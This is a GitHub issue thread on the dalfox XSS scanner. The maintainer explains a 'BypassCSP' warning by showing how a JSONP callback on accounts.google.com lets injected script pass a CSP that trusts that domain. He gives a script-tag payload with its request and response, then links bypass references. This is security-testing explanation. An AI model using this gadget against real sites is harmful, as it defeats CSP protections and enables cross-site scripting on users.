### ISSUE TITLE
BypassCSP didn't understand what it says 

### ISSUE THREAD

**Issue by MR-pentestGuy** [hahwul/dalfox#146]
first of all thank you for the tool it is awsome 
i didn't understand this cspbypass it is refering to list of payloads i have added them in my list of payload strings but still says this message 
if you don't mind can you explain this 

[W] BypassCSP: accounts.google.com
    Needs manual testing. please refer to it. https://t.co/lElLxtainw?amp=1

**Comment by hahwul** [comment]
@MR-pentestGuy 
Hello again,
This means that the CSP of the current target service is set to be bypassed. Of course, it won't be valid if XSS is not found in that service, but if it is, it can be used to actually trigger it.

Even if XSS is found in the domain you tested now, it may not be trigger by CSP policy. But the CSP header trusts `accounts.google.com`, the code below can bypass the CSP and make the attack successful.

```
<script+src="https://accounts.google.com/o/oauth2/revoke?callback=alert(1337)"></script>
```

Why? at `accounts.google.com` we can use the script code.
req
```
https://accounts.google.com/o/oauth2/revoke?callback=alert(1337)
```

res
```
// API callback
alert(1337)({
  "error": {
    "code": 400,
    "message": "Invalid JSONP callback name: 'alert(1337)'; only alphabet, number, '_', '$', '.', '[' and ']' are allowed.",
    "status": "INVALID_ARGUMENT"
  }
}
);
```

**Comment by hahwul** [comment]
https://book.hacktricks.xyz/pentesting-web/content-security-policy-csp-bypass
https://medium.com/@bhaveshthakur2015/content-security-policy-csp-bypass-techniques-e3fa475bfe5d
https://www.hahwul.com/2019/01/27/csp-bypass-technique-xss/
https://portswigger.net/research/bypassing-csp-with-policy-injection
